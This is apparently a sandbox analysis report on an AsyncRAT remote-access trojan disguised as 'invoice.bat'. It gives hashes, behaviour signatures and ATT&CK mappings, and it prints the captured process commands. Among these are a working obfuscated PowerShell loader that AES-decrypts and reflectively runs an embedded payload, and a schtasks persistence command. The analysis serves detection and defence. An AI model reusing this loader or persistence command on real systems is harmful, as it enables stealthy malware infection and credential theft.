asyncrat | 12c87ccc8c293657e41d39202a8ccc02a106ee4128769957d42a206019fcf20d

General

Target

invoice.bat
Size

49KB
MD5

36753b61c8e886f0f49388f72b2435ac
SHA1

20c308298c338520543e4c272b2cd2901bd7cb52
SHA256

12c87ccc8c293657e41d39202a8ccc02a106ee4128769957d42a206019fcf20d
SHA512

cc11219fa92b219d33cd111258fcbda65f02479d06b35c7589040fd9fafff0c842a50f690ad30046eb2e530cb5fbaca3b8ae1c7e23291aeaab4e9acafd5bdc82
SSDEEP

768:F8TRp7qCDMI3IbV+qks5F9x+OZmDFBeTUjG1qEsbae4/evfI4yu/:2utIQ95FbCDFEUBR

Score

10^/10

asyncrat rat spyware stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Executes dropped EXE 2 IoCs

Processes:

invoice.bat.exedwfyhy.bat.exe

pid process

2716 invoice.bat.exe
1636 dwfyhy.bat.exe

pid	process
2716	invoice.bat.exe
1636	dwfyhy.bat.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

invoice.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	invoice.bat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

44 api.ipify.org
43 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5000 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

invoice.bat.exepowershell.exedwfyhy.bat.exe

pid process

2716 invoice.bat.exe
2716 invoice.bat.exe
3060 powershell.exe
3060 powershell.exe
1636 dwfyhy.bat.exe
1636 dwfyhy.bat.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

invoice.bat.exepowershell.exedwfyhy.bat.exe

description pid process

Token: SeDebugPrivilege 2716 invoice.bat.exe
Token: SeDebugPrivilege 3060 powershell.exe
Token: SeDebugPrivilege 1636 dwfyhy.bat.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwfyhy.bat.exe

pid process

1636 dwfyhy.bat.exe
1636 dwfyhy.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

dwfyhy.bat.exe

pid process

1636 dwfyhy.bat.exe
1636 dwfyhy.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

dwfyhy.bat.exe

pid process

1636 dwfyhy.bat.exe

flow	ioc
44	api.ipify.org
43	api.ipify.org

pid	process
5000	schtasks.exe

pid	process
2716	invoice.bat.exe
2716	invoice.bat.exe
3060	powershell.exe
3060	powershell.exe
1636	dwfyhy.bat.exe
1636	dwfyhy.bat.exe

description	pid	process
Token: SeDebugPrivilege	2716	invoice.bat.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	1636	dwfyhy.bat.exe

pid	process
1636	dwfyhy.bat.exe
1636	dwfyhy.bat.exe

pid	process
1636	dwfyhy.bat.exe
1636	dwfyhy.bat.exe

pid	process
1636	dwfyhy.bat.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exeinvoice.bat.execmd.exepowershell.execmd.exedwfyhy.bat.exe

description	pid	process	target process
PID 1720 wrote to memory of 2716	1720	cmd.exe	invoice.bat.exe
PID 1720 wrote to memory of 2716	1720	cmd.exe	invoice.bat.exe
PID 2716 wrote to memory of 2400	2716	invoice.bat.exe	cmd.exe
PID 2716 wrote to memory of 2400	2716	invoice.bat.exe	cmd.exe
PID 2400 wrote to memory of 3060	2400	cmd.exe	powershell.exe
PID 2400 wrote to memory of 3060	2400	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3068	3060	powershell.exe	cmd.exe
PID 3060 wrote to memory of 3068	3060	powershell.exe	cmd.exe
PID 3068 wrote to memory of 1636	3068	cmd.exe	dwfyhy.bat.exe
PID 3068 wrote to memory of 1636	3068	cmd.exe	dwfyhy.bat.exe
PID 1636 wrote to memory of 5000	1636	dwfyhy.bat.exe	schtasks.exe
PID 1636 wrote to memory of 5000	1636	dwfyhy.bat.exe	schtasks.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\invoice.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1720

C:\Users\Admin\AppData\Local\Temp\invoice.bat.exe
"invoice.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $qfpLe = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\invoice.bat').Split([Environment]::NewLine);foreach ($zbumi in $qfpLe) { if ($zbumi.StartsWith(':: ')) { $gJJDY = $zbumi.Substring(3); break; }; };$Piqdg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gJJDY);$edVwk = New-Object System.Security.Cryptography.AesManaged;$edVwk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$edVwk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$edVwk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Aiiudw+fXb86Mnh/w13gDxuD3EbVUZkaOyGHqMc/CQY=');$edVwk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sx2hI0APZjv9Fq8D3SERvQ==');$imDxS = $edVwk.CreateDecryptor();$Piqdg = $imDxS.TransformFinalBlock($Piqdg, 0, $Piqdg.Length);$imDxS.Dispose();$edVwk.Dispose();$YZKNZ = New-Object System.IO.MemoryStream(, $Piqdg);$JKRAg = New-Object System.IO.MemoryStream;$YtWFs = New-Object System.IO.Compression.GZipStream($YZKNZ, [IO.Compression.CompressionMode]::Decompress);$YtWFs.CopyTo($JKRAg);$YtWFs.Dispose();$YZKNZ.Dispose();$JKRAg.Dispose();$Piqdg = $JKRAg.ToArray();$DtnJj = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($Piqdg);$rYEbR = $DtnJj.EntryPoint;$rYEbR.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3068

C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat.exe
"dwfyhy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $SJndT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat').Split([Environment]::NewLine);foreach ($QLWDV in $SJndT) { if ($QLWDV.StartsWith(':: ')) { $JZHeZ = $QLWDV.Substring(3); break; }; };$BIZyJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JZHeZ);$djPeA = New-Object System.Security.Cryptography.AesManaged;$djPeA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$djPeA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$djPeA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GMv9eBoLWTkmuk76IY+wUcRjXAq9KKI7kQkRImlwPMw=');$djPeA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g+7yll3cjbCfLs0p1amTkw==');$kcYzF = $djPeA.CreateDecryptor();$BIZyJ = $kcYzF.TransformFinalBlock($BIZyJ, 0, $BIZyJ.Length);$kcYzF.Dispose();$djPeA.Dispose();$oWhJQ = New-Object System.IO.MemoryStream(, $BIZyJ);$WPiLW = New-Object System.IO.MemoryStream;$rDCBe = New-Object System.IO.Compression.GZipStream($oWhJQ, [IO.Compression.CompressionMode]::Decompress);$rDCBe.CopyTo($WPiLW);$rDCBe.Dispose();$oWhJQ.Dispose();$WPiLW.Dispose();$BIZyJ = $WPiLW.ToArray();$vuHhA = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($BIZyJ);$MZYzR = $vuHhA.EntryPoint;$MZYzR.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:5000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
7ff9440dc25523a288d278b38add13a1

SHA1
d67faf5afe85cacd9d816349f17ded3686ecf1a7

SHA256
ac518124d3bd39440bfba66739f8fab57ff82ea778f707ea2c902b29efde0ee0

SHA512
7116fcf6760a69efebfbffeba5abcfef903cc8647e142117023e022bb34c5fe6d1a35c727faab1e6d6505b2bd69689cf52f8ecef5253ca12d99d425021799911

Download Submit
C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat

Filesize
325KB

MD5
87f40741c0d7679754316868761244cd

SHA1
318530a59ff19f2ff99d1f6d6397df0c2c5ce403

SHA256
ead12e771ed82f402177b90531bc2a5312759d8d349797ec013fc4852badb518

SHA512
37ff93ce13a157170eeac91f05f6562536ad48743fcc3124a06c1c6a12cea135e6c02e6a05af31bd5ac726b76098745d0bc6fe49f94a1fbd25ef36e7f79fcb20

Download Submit
C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dwfyhy.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\invoice.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\invoice.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/1636-152-0x0000029B322F0000-0x0000029B32340000-memory.dmp

Filesize
320KB

Download
memory/1636-146-0x0000000000000000-mapping.dmp

Download
memory/1636-150-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1636-153-0x0000029B32900000-0x0000029B329B2000-memory.dmp

Filesize
712KB

Download
memory/1636-154-0x0000029B32F70000-0x0000029B33132000-memory.dmp

Filesize
1.8MB

Download
memory/1636-155-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-140-0x0000000000000000-mapping.dmp

Download
memory/2716-138-0x00000204C6270000-0x00000204C628E000-memory.dmp

Filesize
120KB

Download
memory/2716-139-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2716-137-0x00000204C6930000-0x00000204C69A6000-memory.dmp

Filesize
472KB

Download
memory/2716-136-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2716-134-0x00000204C55B0000-0x00000204C55D2000-memory.dmp

Filesize
136KB

Download
memory/2716-132-0x0000000000000000-mapping.dmp

Download
memory/3060-145-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/3060-142-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/3060-141-0x0000000000000000-mapping.dmp

Download
memory/3068-144-0x0000000000000000-mapping.dmp

Download
memory/5000-151-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads